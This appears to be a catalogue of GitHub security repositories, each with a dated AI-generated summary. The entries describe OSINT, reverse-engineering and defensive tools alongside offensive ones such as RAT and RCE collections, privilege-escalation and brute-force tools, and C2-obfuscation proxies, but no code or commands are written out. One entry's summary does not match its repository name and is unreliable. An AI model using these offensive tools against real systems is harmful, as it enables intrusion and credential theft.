AI Summary: Awesome Android Reverse Engineering is a comprehensive repository that curates a wide range of resources, training, and tools specifically designed for reverse engineering Android applications and systems. It includes categories for static and dynamic analysis tools, decompilers, malware analysis, and extensive training materials such as courses, videos, and books. Notably, it provides a user-friendly navigation system with search functionality and highlights significant resources to facilitate efficient learning and research in Android security.

awesome-aws-security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome AWS Security is a curated repository that aggregates a wide range of resources related to AWS security practices, including whitepapers, books, videos, tutorials, and security tools. It serves as a comprehensive educational tool for professionals and enthusiasts seeking to enhance their knowledge of AWS security, featuring a well-structured table of contents and links to valuable references and training materials. Notable features include categorized resources for various learning preferences, from free content to paid courses, as well as a focus on contemporary security issues and best practices.

Awesome-Blackhat-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Black Hat Tools is a curated repository of cybersecurity tools showcased at Black Hat events globally, serving as a practical reference for professionals in offensive, defensive, and research-driven cybersecurity. The tools are systematically organized by event location, year, and category, including Red Teaming, OSINT, and more, ensuring easy accessibility for users seeking field-tested solutions. This repository encourages community contributions to continually enhance the collection, making it a dynamic resource for current cybersecurity methodologies.

awesome-bugbounty-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Bug Bounty Tools is a comprehensive, curated repository of various tools utilized in the bug bounty hunting and penetration testing process. It encompasses a wide range of categories including reconnaissance, exploitation, and miscellaneous utilities, featuring tools for tasks such as subdomain enumeration, various injection techniques, and vulnerability scanning. With an extensive selection of resources, this repository aims to streamline the bug hunting workflow for security professionals.

README

Awesome Bug Bounty Tools

A curated list of various bug bounty tools

awesome-censys-queries

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Censys Queries is a curated collection of unique and diverse queries intended for use with the Censys search engine, facilitating the exploration of various network services and devices. Its primary use case is to aid security researchers and network administrators in identifying and analyzing infrastructure, particularly in areas like industrial control systems, IoT devices, and database services. Notable features include organized categories for easy navigation, direct links to search results, and contributions from the community for expanding query resources.

Awesome-Cybersecurity-Handbooks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Awesome Cybersecurity Handbooks” repository is a comprehensive collection of resources and personal notes aimed at aiding individuals in the fields of red teaming and Capture The Flag (CTF) challenges. This tool features a variety of topics including information gathering, vulnerability analysis, web application assessment, and post-exploitation strategies, serving as an extensive guide for cybersecurity professionals to enhance their knowledge and skills for legal purposes. Notable aspects include frequent updates and a commitment to legal and ethical use of the provided materials.

awesome-executable-packing

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Executable Packing is a comprehensive resource catalog focused on the techniques and tools related to the packing of executable files, including various formats like Portable Executable and Executable and Linkable Format. The repository collects literature, datasets, packing tools, and detection methodologies, emphasizing the key functions of packing such as compression, encryption, and obfuscation to protect and modify executables. Notable features include curated references to scholarly articles, documentation, and a classification of packers by historical context.

awesome-flipperzero-withModules

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Awesome Flipper Zero with Modules” repository is an enhanced resource collection for the Flipper Zero device, providing a variety of plugins, payloads, and databases to extend its functionality. Notable features include access to numerous pre-configured BadUSB payloads, IR device dumps, and various custom files for generating or interacting with Flipper Zero formats. This repository serves as a comprehensive toolkit for users looking to maximize their experience and capabilities with the Flipper Zero platform.

awesome-golang-security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “awesome-golang-security” repository is a curated collection of security-related resources tailored specifically for the Go programming language. It includes a variety of tools, libraries, and educational materials aimed at enhancing security in Go applications, notably covering aspects such as web framework hardening, static code analysis, and vulnerability management. Key features include middleware for CSRF protection, static analysis tools to identify security vulnerabilities in code, and comprehensive lists of known vulnerabilities for Go libraries.

awesome-hacker-search-engines

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Hacker Search Engines is a curated repository of search engines specifically designed for penetration testing, vulnerability assessments, and red/blue team operations. It categorizes various resources including general search engines, servers, vulnerabilities, exploits, and more, providing tools for effective reconnaissance and threat intelligence gathering. Notable features include links to specialized engines like Shodan and the NIST NVD, enabling streamlined access to critical information for security professionals.

README

Awesome Hacker Search Engines

A curated list of awesome search engines useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more

awesome-hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome hacking is an awesome collection of hacking tools.

Awesome hacking is an awesome collection of hacking tools.

awesome-hacking-lists

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “awesome-hacking-lists” repository is a curated collection of GitHub stars organized by programming languages and tools relevant to cybersecurity and hacking. Its primary use case is to provide a comprehensive reference for security professionals and enthusiasts looking for resources, projects, and exploits in various programming environments. Notable features include structured content for easy navigation and a wide array of topics spanning multiple technology stacks.

README

Awesome Stars

A curated list of my GitHub stars! Generated by starred.

Awesome-Hacking-Resources

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Hacking Resources is a comprehensive collection of materials designed for individuals looking to enhance their skills in hacking and penetration testing. The repository includes various categories such as learning resources, online courses, forums, and tools crucial for topics like malware analysis and network scanning, promoting community contribution and knowledge sharing within the cybersecurity field. Notably, it features a dedicated list of tools and links to educational content, making it a valuable resource for both beginners and advanced practitioners.

awesome-list

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Awesome Cybersecurity List” repository aggregates a personal collection of insightful blog posts, research papers, and write-ups pertaining to various aspects of cybersecurity. It serves as a resource for both enthusiasts and professionals looking for in-depth analysis on contemporary cybersecurity topics and advancements. Notable features include a chronological outline of topics and a dedicated section for cybersecurity tools, ensuring users can easily navigate through valuable content.

README

Awesome Cybersecurity List

My personal collection of awesome blog posts, write-ups, and papers focusing on cybersecurity.

awesome-list-of-secrets-in-environment-variables

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Awesome List of Secrets in Environment Variables” repository provides a comprehensive compilation of sensitive information, such as secrets, API keys, and tokens commonly stored in environment variables across various platforms. Its primary use case is to educate and inform developers about potential vulnerabilities associated with storing secrets in environment variables and to suggest better security practices to avoid data leaks. Notable features include categorized listings of secrets from different services, security recommendations, and links to relevant documentation for each entry.

awesome-llvm-security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The awesome-llvm-security repository is a curated collection of skills designed for AI agents and coding assistants that focus on LLVM security topics. It provides a set of specialized techniques, including binary lifting, dynamic instrumentation, code obfuscation, and various LLVM tooling resources, making it a valuable asset for developers and researchers in compiler development and security hardening. Notable features include an easy installation process for these skills using npx and comprehensive resources for learning and implementing LLVM-related security practices.

awesome-malware-analysis

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Awesome Malware Analysis repository provides a comprehensive curated list of malware analysis tools and resources, aimed at enhancing research and understanding of malware threats. Notable features include sections on various categories such as malware collections, open-source threat intelligence, detection and classification methodologies, and online scanners, facilitating a structured approach for analysts. This resource serves as a valuable reference for cybersecurity professionals seeking effective tools for malware research and investigation.

awesome-mobile-security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “awesome-mobile-security” repository serves as a comprehensive resource for mobile security professionals, aggregating a wide range of blogs, papers, and how-to resources relevant to Android security and penetration testing. Its primary use case is to provide guidance and knowledge on mobile application vulnerabilities, security testing methodologies, and tools, making it a valuable asset for those aiming to improve mobile application security. Notable features include links to various security guides, OWASP resources, and pentesting labs, enabling users to deepen their understanding and practical skills in mobile security.

awesome-oneliner-bugbounty

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Awesome One-liner Bug Bounty” repository compiles a collection of efficient one-liner scripts specifically designed for bug bounty hunting, enabling users to identify vulnerabilities in web applications quickly. Notable features include commands for detecting Local File Inclusion, Open Redirects, Cross-Site Scripting, and various CVEs, all leveraging concise syntax to streamline reconnaissance and exploitation tasks. The repository encourages community contributions, fostering a collaborative environment for continuous improvement and sharing of bug bounty strategies.

awesome-oscp

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Awesome OSCP repository is a curated collection of resources aimed at individuals preparing for the Offensive Security Certified Professional (OSCP) certification. It includes a variety of materials such as reviews, guides, cheatsheets, and specialized scripts covering key topics like buffer overflows and privilege escalation, facilitating a structured and comprehensive study approach for aspiring penetration testers. Notable features include extensive links to preparation guides, practical hacking tips, and tools specifically designed to aid in the OSCP exam.

awesome-osint

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome OSINT is a curated repository of open-source intelligence tools and resources designed for individuals involved in Cyber Threat Intelligence (CTI) and threat hunting. The repository offers a comprehensive list of utilities across various categories, including search engines, social media tools, and data analysis resources, catering to users from beginner to advanced levels. Notable features include specialized searches for academic resources, geospatial mapping, threat actor insights, and dark web exploration, enabling proactive intelligence gathering from publicly available sources.

Awesome-OSINT-For-Everything

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome OSINT For Everything is a comprehensive repository of OSINT tools and websites aimed at penetration testing, red teaming, information gathering, and bug bounty initiatives. It organizes a wide array of resources categorized by specific use cases such as recon, threat intelligence, social media analysis, and more, making it a valuable tool for cybersecurity professionals seeking to enhance their investigative capabilities. Notable features include a detailed index of tools across various domains, including geo-location, cryptocurrency, and privacy/security resources, providing users with extensive options for OSINT-related tasks.

awesome-php-security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “awesome-php-security” repository is a curated collection of resources focused on enhancing security in PHP applications. Its primary use case is to provide developers with tools, educational materials, and best practices to mitigate security vulnerabilities. Notable features include sections on web framework hardening, static code analysis tools, and a comprehensive list of vulnerabilities and security advisories.

README

A curated list of awesome PHP Security related resources.

awesome-privilege-escalation

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Privilege Escalation is a comprehensive resource that curates techniques, tools, and methodologies for privilege escalation across multiple platforms, including Linux, Windows, Docker, and cloud environments. It features a structured table of contents with links to guides, techniques, and relevant presentations, allowing security professionals to efficiently explore various escalation vectors and strategies. Notable sections include targeted discussions on specific operating system techniques and curated tools for CVE identification and exploitation.

awesome-python-security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “awesome-python-security” repository is a curated collection of resources focused on security related to Python programming. Its primary use case is to serve developers and security professionals by aggregating tools, educational materials, and references for secure coding practices, vulnerability detection, and compliance. Notable features include a categorized list of security tools like static code analysis, frameworks for web application security, and links to vulnerability databases and educational resources.

awesome-rat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The ‘awesome-rat’ repository serves as a comprehensive catalog of over 250 open-source Remote Access Tools (RATs) and associate Command & Control (C&C) frameworks, along with 1200+ analytical reports and articles related to RATs. It provides a structured directory that categorizes both open-source and commercial tools, as well as notable examples of malicious software, making it a valuable resource for cybersecurity professionals seeking to understand and analyze RATs and their implications. Key features include a detailed listing of tools, extensive documentation, and links to related research articles.

Awesome-RCE-techniques

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Awesome RCE Techniques” repository is an open-source knowledge database that compiles various methods for achieving Remote Code Execution (RCE) across different applications. It features a collection of 24 RCE techniques categorized by platform type, including Content Management Systems and frameworks, each accompanied by Docker images for practical training and testing. This resource facilitates learning and experimentation for security professionals and developers interested in RCE dynamics.

README

Awesome RCE techniques

Awesome list of techniques to achieve Remote Code Execution (RCE) on various apps!

Awesome-Redteam

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome-Redteam is a comprehensive knowledge base designed for red teaming and offensive security research, providing users with a curated collection of tools, scripts, and tips. It features organized sections covering various aspects such as cybersecurity cheat sheets, cryptographic methods, cyberspace search tools, and open-source intelligence resources, all intended for educational purposes. The repository emphasizes legal usage and warns against employing its content for unauthorized activities.

README

Awesome-Redteam

❗【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。使用本项目前请先阅读法律法规。

Awesome-RedTeam-Cheatsheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Awesome Red Team Cheatsheet is a comprehensive reference tool designed for red team practitioners, providing techniques and methodologies for various stages of the attack lifecycle, including initial access, privilege escalation, lateral movement, and evasion strategies. It offers detailed sections on specific tactics like credential dumping, active directory exploitation, and OSINT, along with supporting guides on Windows protocols and operational security (OPSEC). Notable features include links to targeted exploitation techniques and enumeration strategies, aiding cybersecurity professionals in simulating attacks and improving defensive measures.

awesome-security-hardening

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome Security Hardening is a comprehensive repository that compiles best practices, guides, and resources for security hardening across various platforms including operating systems, network devices, and cloud services. Its notable features include detailed checklists, benchmarks (like CIS and ANSSI), and a curated list of tools for assessing and implementing security measures, catering to both general users and cybersecurity professionals. The project encourages community contributions to continually enhance its breadth and usability.

awesome-social-engineering

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Awesome Social Engineering repository offers a curated collection of resources and tools specifically designed for cybersecurity professionals, penetration testers, and educational purposes within controlled environments. It features a diverse range of materials, including online courses, literature on psychology relevant to social engineering, and tools for practical application, making it a comprehensive guide for those interested in the field. Notably, it emphasizes ethical use and provides an engaging platform for learning and skill enhancement in social engineering techniques.

Awesome-Telegram-OSINT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome-Telegram-OSINT is a comprehensive repository designed for Open Source Intelligence (OSINT) related to Telegram. Its primary use case is to facilitate the search and discovery of Telegram channels, groups, and tools through a curated list of search engines and directories. Notable features include a wide array of resources for searching Telegram content, including specialized databases, search engines, and community-driven catalogs, making it a valuable tool for researchers and analysts in the OSINT community.

awesome-termux-hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “awesome-termux-hacking” repository aggregates a collection of tools designed for penetration testing and security assessments on Android devices using the Termux environment. Key tools include ANDRAX, a robust penetration testing platform that functions natively on Android, and ReconCobra, an automated pentest framework for information gathering. This repository enhances the capabilities of ethical hacking on mobile platforms by offering various utilities for tasks such as subdomain enumeration, exploit searching, and proxy management.

awesome-web-hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “awesome-web-hacking” repository serves as a comprehensive resource for individuals seeking to enhance their knowledge of web application security. It includes categorized lists of books, documentation, tools, cheat sheets, and educational courses, making it a valuable starting point for learning about penetration testing and various security vulnerabilities. Notable features include contributions from the community through pull requests and a diverse array of resources for both beginners and experienced security professionals.

awesome-yara

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Awesome YARA is a curated repository that aggregates a comprehensive collection of YARA rules, tools, and resources aimed at enhancing malware detection and analysis. It serves as a valuable resource for cybersecurity professionals and researchers, featuring contributions from various practitioners, performance guidelines, and annual challenges to foster community engagement in YARA rule creation. Notable features include a wide array of rule collections from established cybersecurity entities and active maintenance status indicators for repositories of interest.

BabySploit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BabySploit is a user-friendly penetration testing toolkit designed to assist users in learning more complex frameworks like Metasploit. It features an intuitive interface and a suite of tools for exploiting vulnerabilities, making it accessible for users of all experience levels, while being optimized for Kali Linux and also tested for macOS compatibility. Notable functionality includes an integrated configuration management system and support for various essential exploitation tools.

README

Made For Kali Linux. No Support For Other Distros If There Are Problems. Tested and Working on MacOS for most Tools.
Developed by @maxbridgland
Donate

BadPotato

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BadPotato is a penetration testing tool designed for exploiting a vulnerability within Windows operating systems, specifically targeting Windows Server 2012-2019 and Windows 8-10. Its primary use case is to escalate privileges by abusing the Print Spooler service, enabling attackers to execute arbitrary code with elevated permissions. Notable features include efficient integration with existing exploits and a straightforward execution process for security professionals.

README

BadPotato

Windows 2012-2019

Windows 8-10

Baileys

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Baileys is a WebSockets-based TypeScript library designed for direct interaction with the WhatsApp Web API, eliminating the need for Selenium or any browser, thus optimizing memory usage. It supports both the multi-device and web versions of WhatsApp, allowing developers to efficiently implement messaging functionalities. Notable features include a simplified interface for interaction and removal of browser dependencies, reducing resource overhead.

README

Baileys is a WebSockets-based TypeScript library for interacting with the WhatsApp Web API.

[!CAUTION] NOTICE OF BREAKING CHANGE.

bandit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Bandit is a security linter specifically designed to identify common security vulnerabilities in Python code by analyzing the Abstract Syntax Tree (AST) of the source files. Its primary use case is to enhance code security through comprehensive scanning and reporting, and it features the ability to run various plugins to detect different types of security issues. Bandit also supports containerization, allowing it to be easily deployed as a Docker image for versatile integration into development workflows.

Bashark

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Bashark 2.0 is a post-exploitation toolkit designed for penetration testers and security researchers to facilitate operations during the post-exploitation phase of security audits. It offers a simple command-line interface, where users can source the bashark.sh script to access various functions and commands, streamlining the process of managing compromised hosts. Key features include ease of use through a help menu and support for Bash scripting, making it a practical tool for enhancing post-exploitation activities.

bashbunny-payloads

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Bash Bunny Payload Library provides a collection of community-developed payloads and extensions specifically designed for the Hak5 Bash Bunny, utilizing DuckyScript™ and Bash scripting languages. Its primary use case is to enable users to automate various tasks through the intuitive deployment of scripts, with notable features including community contributions and the ability to submit new payloads via pull requests. Additionally, the repository encourages collaboration and offers resources for building payloads through its associated PayloadStudio.

Bashfuscator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Bashfuscator is a modular Bash obfuscation framework implemented in Python 3 that specializes in generating highly obfuscated Bash commands and scripts to evade detection on Linux systems. Designed for both Red Team and Blue Team operations, it allows users to produce randomized, convoluted Bash code that still executes the intended commands, effectively aiding in the development of obfuscation techniques and detection testing. Key features include command line and library usage, a variety of obfuscation mutators, and compatibility with GNU Linux systems running Bash 4.0 or newer.

bbot

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BBOT is a versatile reconnaissance tool designed primarily for automating tasks related to bug bounties and attack surface management (ASM). Notable features include comprehensive subdomain enumeration, web crawling to extract sensitive information, and an efficient integration of multiple APIs to enhance data gathering effectiveness. The tool also boasts a real-time visualization capability, allowing users to intuitively analyze results.

README

BEE·bot is a multipurpose scanner inspired by Spiderfoot, built to automate your Recon, Bug Bounties, and ASM!

https://github.com/blacklanternsecurity/bbot/assets/20261699/e539e89b-92ea-46fa-b893-9cde94eebf81

BinAbsInspector

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BinAbsInspector is a static analysis tool designed for automated reverse engineering and vulnerability scanning of binary files, utilizing abstract interpretation and integrating with Ghidra. It supports multiple architectures including x86, x64, armv7, and aarch64, and can operate in headless mode, GUI mode, or within a Docker environment. Notable features include customizable analysis parameters, Z3 integration for constraint solving, and the ability to output results in JSON format.

README

What is BinAbsInspector?

BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at Keenlab. It is based on abstract interpretation with the support from Ghidra. It works on Ghidra’s Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64.

binaryninja-api

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Binary Ninja API repository provides comprehensive C++, Python, and Rust APIs for the Binary Ninja reverse engineering platform, enabling developers to create plugins and enhance functionality. Notable features include extensive online documentation, examples for various applications, and support for building UI and headless plugins. The setup process includes CMake-based build instructions, ensuring compatibility with specific Binary Ninja versions through a revision hash.

README

Binary Ninja API

This repository contains documentation and source code of the C++, Python, and Rust APIs for the Binary Ninja reverse engineering platform.

bincat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BinCAT is a static binary code analysis toolkit designed to assist reverse engineers using IDA and Python automation. Its primary use cases include value and taint analysis, type reconstruction, and detection of memory management issues like use-after-free and double-free errors. Notable features include support for multiple CPU architectures, integration with IDA version 7.4 or later, and the ability to operate both locally and remotely via a web service.

binder-trace

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Binder Trace is a Python-based tool designed for intercepting and parsing Android Binder messages, functioning similarly to Wireshark for Binder communication. It requires a rooted Android device or emulator and leverages Frida for live analysis, allowing users to attach to specific processes and capture Binder transactions. Notable features include support for various Android versions, customizable structure files, and interactive controls for navigating captured data.

README

Binder Trace

Binder Trace is a tool for intercepting and parsing Android Binder messages. Think of it as “Wireshark for Binder”.

binexport

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BinExport is a plugin for disassemblers such as IDA Pro, Binary Ninja, and Ghidra that facilitates the export of disassembly data into Protocol Buffer format, which is essential for use with the BinDiff tool. Its primary use case is in binary analysis and reverse engineering, enabling users to perform efficient comparison and analysis of executable files. Notable features include support for multiple platforms (Linux, macOS, Windows) and seamless integration with popular static analysis tools.

binsider

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Binsider is a versatile tool designed for reverse engineers, enabling both static and dynamic analysis of binary files through an intuitive terminal interface. Key functionalities include inspection of binary metadata, string analysis, examination of linked libraries, and detailed ELF layout analysis, all aimed at enhancing understanding of executable files.

README

"Swiss army knife for reverse engineers."

Documentation | Website

😼🕵️‍♂️ Binsider can perform static and dynamic analysis, inspect strings, examine linked libraries, and perform hexdumps, all within a user-friendly terminal user interface!

biodiff

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: biodiff is a binary file comparison tool that employs bioinformatics algorithms to align and display two binary files side by side, allowing users to identify similarities and differences in byte sequences. Its notable features include customizable byte representations, multiple viewing modes (aligned and unaligned), and advanced search capabilities using text and regex, which facilitate detailed analysis of binary data. Additionally, users can perform both block-level and global alignments, making it suitable for examining varying sizes of binary files efficiently.

black-hat-rust

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Black Hat Rust is a specialized resource for understanding and implementing offensive security techniques using the Rust programming language. It covers a broad spectrum of offensive security concepts, including building custom tools for cyber attacks, phishing, and exploitation, while emphasizing practical application and real-world Rust programming practices. Notable features include multi-threaded attack surface discovery and async operations, making it suitable for both developers looking to enhance their security skills and security engineers aiming to leverage Rust for offensive purposes.

blackarch

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BlackArch Linux is a penetration testing distribution based on Arch Linux, providing a repository of over 2,800 security tools organized by category. It offers flexible installation options, compatibility with existing Arch setups, and features a Live ISO for immediate testing. The toolset is aimed at penetration testers and security researchers for tasks such as forensics, reverse engineering, and network analysis.

Description

BlackArch Linux is an Arch Linux–based penetration testing distribution for penetration testers and security researchers. The repository contains 2850 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installations. For more information, see the installation instructions.

blackbird

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Blackbird is an OSINT tool designed for rapid username and email searches across over 600 platforms, integrating AI-powered profiling for enhanced data analysis. Notable features include community-driven accuracy, smart filters, automated analysis, and the ability to export results as PDF or CSV files. It leverages tools like WhatsMyName to provide low false positive rates while ensuring user privacy during its operations.

README

Blackbird

Blackbird is a powerful OSINT tool that combines fast username and email searches across more than 600 platforms with free AI-powered profiling. By leveraging community-driven projects like WhatsMyName, it ensures low false positive rates and high-quality results. Features include smart filters, polished PDF/CSV exports, and fully automated analysis — all from a single CLI.

BlackFriday-GPTs-Prompts

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: AnyClaw is an Android application that integrates OpenClaw and Codex, enabling two AI coding agents to perform tasks without requiring root access or Termux. Its primary use case is to facilitate coding assistance and prompt generation across various domains, including programming and marketing. Notable features include a user-friendly interface and the ability to handle multiple types of prompts, making it versatile for different user needs.

README

AnyClaw — OpenClaw + Codex running natively on Android

Two AI coding agents in one APK. No root. No Termux.

BlackWidow

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BlackWidow is a Python-based web application spider designed for gathering critical information from target websites, including subdomains, URLs, dynamic parameters, email addresses, and phone numbers. It features an integrated fuzzer, Inject-X, which scans dynamic URLs for common OWASP vulnerabilities, and automatically saves collected data into organized text files. Notable functionalities include deep crawling with customizable levels, verbose logging, and support for fuzzing unique parameters for enhanced security testing.

BLUESPAWN

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BLUESPAWN is an active defense and endpoint detection and response tool designed for blue teams to monitor systems in real-time and identify malicious activities within a network. Its notable features include the ability to detect, identify, and eliminate malware, as well as its open-source nature, fostering community collaboration for continuous improvement. The tool emphasizes rapid detection and understanding of the Windows attack surface against advanced threats, while providing visibility into its detection capabilities aligned with the MITRE ATT&CK framework.

BlueTeam-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BlueTeam-Tools is a comprehensive repository comprising over 65 tools and resources tailored for blue teaming activities, encompassing tasks such as network discovery, vulnerability management, and security monitoring. Notable features include a variety of specialized scanners like Nmap and OpenVAS, as well as systems for data visualization and malicious traffic detection, aimed at enhancing defensive cybersecurity measures. This collection serves as an essential toolkit for security professionals focusing on threat detection and incident response.

bluing

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Bluing is a specialized intelligence gathering tool designed to exploit vulnerabilities in Bluetooth protocols, facilitating various hacking techniques on Bluetooth devices. It provides essential features such as device address cleaning, hardware compatibility checks, and command options for managing Bluetooth connections, including Basic Rate and Low Energy systems. The tool is primarily intended for use on Linux operating systems, leveraging dependencies like BlueZ and requires Python 3.10 for installation.

bopscrk

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: bopscrk is a targeted wordlist generator designed for crafting customized password lists based on personal information related to a specific target. Its notable features include the ability to combine various word combinations, perform customizable case and leet transformations, and leverage lyrics from artists for enhanced wordlist creation, all accessible through an interactive mode or a command-line interface. The tool is included in the BlackArch Linux penetration testing distribution and is built with Python 3.

botw

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The zeldaret/botw repository is an experimental work-in-progress decompilation of The Legend of Zelda: Breath of the Wild version 1.5.0 for the Nintendo Switch. Its primary use case is to facilitate the understanding of the game’s internal mechanics, support glitch hunting efforts, and provide comprehensive documentation for future reverse engineering initiatives. Notable features include ongoing progress tracking and community collaboration through Discord for contributors.

README

The Legend of Zelda: Breath of the Wild

BounceBack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: BounceBack is a versatile reverse proxy tool designed to enhance the security of red team operations by obfuscating the command-and-control (C2) or phishing infrastructure from detection by blue teams and security tools. It features a highly customizable filtering system that leverages real-time traffic analysis, extensive blacklists, and support for multiple protocols, enabling precise control over which traffic is allowed or denied. Notable capabilities include malleable C2 profile parsing, comprehensive IP address validation, domain fronting, and a robust logging mechanism for monitoring incoming requests and potential security threats.

brakeman

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Brakeman is a static analysis tool designed to identify security vulnerabilities in Ruby on Rails applications. It supports a wide range of output formats, includes features for ignoring specific checks, and allows for comparing current scans with previous results. Built to be compatible with various Rails versions, it can be run locally or via Docker, providing extensive configuration options for detailed security assessments.

README

breaking-and-pwning-apps-and-servers-aws-azure-training

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Breaking and Pwning Apps and Servers on AWS and Azure” repository provides comprehensive, hands-on training for security testers and DevSecOps professionals focusing on vulnerability assessment and penetration testing within cloud environments. It includes structured documentation, setup files for creating student virtual machines, and additional resources to facilitate practical lab experiences in identifying and exploiting security weaknesses in AWS and Azure platforms. The training emphasizes real-world attack scenarios and techniques, making it a valuable resource for professionals aiming to bolster their cloud security expertise.

brutespray

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Brutespray is a credential brute-forcing tool designed to automatically test default credentials against discovered services from various scan outputs, including Nmap and Nessus. It supports over 30 protocols and features capabilities such as multi-auth support, password spray mode, an interactive terminal UI, and resume functionality, allowing for efficient and comprehensive credential testing across networks. The tool is built in Go and offers extensive customization options through YAML configuration files and embedded wordlists.

Bug_Bounty_writeups

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Bug Bounty Writeups repository serves as a comprehensive collection of write-ups documenting various types of security vulnerabilities encountered during bug bounty hunts, such as XSS, CSRF, and SQL injection. Its primary use case is to provide guidance and examples for ethical hackers and security researchers looking to enhance their skills and avoid common pitfalls in vulnerability disclosure. Notable features include a structured organization of write-ups by vulnerability type and the use of Bash for automation in certain contexts.

Bug-Bounty-Methodology

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Bug-Bounty-Methodology is a collection of checklists designed for systematic bug bounty hunting. It covers various security testing scenarios, including 2FA testing, CAPTCHA bypass, CSRF protection, and OAuth misconfiguration, providing comprehensive guidelines for identifying vulnerabilities in web applications. Notable features include a structured compilation of methodologies tailored for different attack vectors and documentation that serves as a practical resource for penetration testers.

README

Bug-Bounty-Methodology

These are my checklists which I use during my bug bounty hunting.

bundler-audit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Bundler-audit is a vulnerability checker for Ruby applications that audits a project’s Gemfile.lock for insecure gem versions and insecure sources. It features the ability to ignore certain advisories, provides detailed advisory information, and does not require an active network connection to perform audits. Ideal for integrating into CI workflows, it enables developers to ensure their applications are secure by identifying and suggesting updates for vulnerable gems.

README

bundler-audit

burp-ai-agent

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Burp AI Agent is an extension for Burp Suite that enhances security testing workflows by integrating AI capabilities. It supports multiple AI backends, allowing users to run both passive and active vulnerability scans across a wide array of vulnerability classes, while featuring options for privacy settings and audit logging for compliance. Additionally, it can connect to external AI agents via the MCP, enabling autonomous operation and enriching the security analysis process.

Burp-Suite-Certified-Practitioner-Exam-Study

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Burp Suite Certified Practitioner Exam Study repository contains comprehensive study notes and practical labs designed to aid candidates in preparing for the Burp Suite Certified Practitioner (BSCP) Exam. It includes over 110 labs covering essential topics such as scanning, footholds, privilege escalation, and data exfiltration, alongside practical techniques and scripts tailored for effective web application security testing. Notable features include a structured approach to vulnerability assessment and recommendations for additional training materials and resources to enhance exam readiness.

BurpBounty

Mon, 30 Mar 2026 00:00:00 +0000

